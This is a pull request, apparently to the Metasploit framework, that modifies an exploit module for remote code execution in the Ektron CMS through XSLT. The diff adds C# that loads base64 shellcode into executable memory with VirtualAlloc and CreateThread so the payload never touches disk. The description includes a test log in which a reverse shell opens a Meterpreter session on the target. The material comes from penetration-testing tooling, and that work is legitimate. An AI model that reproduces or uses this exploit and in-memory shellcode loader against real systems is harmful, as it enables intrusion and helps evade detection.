### PR TITLE
added c# code by Nicolas Gregoire

### DIFF
--- a/modules/exploits/windows/http/ektron_xslt_exec.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec.rb
@@ -13,7 +13,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE
-	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -27,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         => [
 				'Rich Lundeen', # Vulnerability discovery
-				'juan vazquez' # Metasploit module
+				'juan vazquez', # Metasploit module
+				'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread
 			],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -102,35 +102,6 @@ return "#{fingerprint}";
 		return Exploit::CheckCode::Safe
 	end
 
-
-	def on_new_session(session)
-		if session.type == "meterpreter"
-			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-		end
-
-		@dropped_files.delete_if do |file|
-			win_file = file.gsub("/", "\\\\")
-			if session.type == "meterpreter"
-				begin
-					windir = session.fs.file.expand_path("%WINDIR%")
-					win_file = "#{windir}\\Temp\\#{win_file}"
-					# Meterpreter should do this automatically as part of
-					# fs.file.rm().  Until that has been implemented, remove the
-					# read-only flag with a command.
-					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
-					session.fs.file.rm(win_file)
-					print_good("Deleted #{file}")
-					true
-				rescue ::Rex::Post::Meterpreter::RequestError
-					print_error("Failed to delete #{win_file}")
-					false
-				end
-
-			end
-		end
-
-	end
-
 	def uri_path
 		uri_path = target_uri.path
 		uri_path << "/" if uri_path[-1, 1] != "/"
@@ -154,10 +125,8 @@ return "#{fingerprint}";
 	def exploit
 
 		print_status("Generating the EXE Payload and the XSLT...")
-		exe_data = generate_payload_exe
-		exe_string = Rex::Text.to_hex(exe_data)
-		exename = rand_text_alpha(5 + rand(5))
 		fingerprint = rand_text_alpha(5 + rand(5))
+
 		xslt_data = <<-XSLT
 <?xml version='1.0'?>
 <xsl:stylesheet version="1.0"
@@ -166,24 +135,27 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt"
 xmlns:user="http://mycompany.com/mynamespace">
 <msxsl:script language="C#" implements-prefix="user">
 <![CDATA[
+
+private static UInt32 MEM_COMMIT = 0x1000;
+private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
+
+[System.Runtime.InteropServices.DllImport("kernel32")]
+private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
+
+[System.Runtime.InteropServices.DllImport("kernel32")]
+private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
+
 public string xml()
 {
-char[] charData = "#{exe_string}".ToCharArray();
-string fileName = @"C:\\windows\\temp\\#{exename}.txt";
-System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
-System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
-for (int i = 0; i < charData.Length; i++)
-{
-	bw.Write( (byte) charData[i]);
-}
-bw.Close();
-fs.Close();
-System.Diagnostics.Process p = new System.Diagnostics.Process();
-p.StartInfo.UseShellExecute = false;
-p.StartInfo.RedirectStandardOutput = true;
-p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
-p.Start();
-return "#{fingerprint}";
+	string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
+	byte[] shellcode = System.Convert.FromBase64String(shellcode64);
+	UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
+	IntPtr hThread = IntPtr.Zero;
+	IntPtr pinfo = IntPtr.Zero;
+	UInt32 threadId = 0;
+	hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
+	return "#{fingerprint}";
 }
 ]]>
 </msxsl:script>
@@ -210,7 +182,6 @@ return "#{fingerprint}";
 			})
 		if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
 			print_good("Exploitation was successful")
-			register_file_for_cleanup("#{exename}.txt")
 		else
 			fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
 		end


### PR DESCRIPTION
Used the C# code by Nicolas Gregoire to avoid dropping shellcode to filesystem. See:

https://dev.metasploit.com/redmine/issues/6784

Nicolas credited in the module too.

Test:

<pre>
msf > use exploit/windows/http/ektron_xslt_exec 
msf  exploit(ektron_xslt_exec) > reload
[*] Reloading module...
msf  exploit(ektron_xslt_exec) > set RHOST 192.168.1.139
RHOST => 192.168.1.139
msf  exploit(ektron_xslt_exec) > check
[+] The target is vulnerable.
msf  exploit(ektron_xslt_exec) > exploit

[*] Started reverse handler on 192.168.1.129:4444 
[*] Generating the EXE Payload and the XSLT...
[*] Trying to run the xslt transformation...
[+] Exploitation was successful
[*] Sending stage (752128 bytes) to 192.168.1.139
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.139:2090) at 2012-12-11 16:32:43 +0100

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit 
[*] Shutting down Meterpreter...

[*] 192.168.1.139 - Meterpreter session 1 closed.  Reason: User exit

</pre>
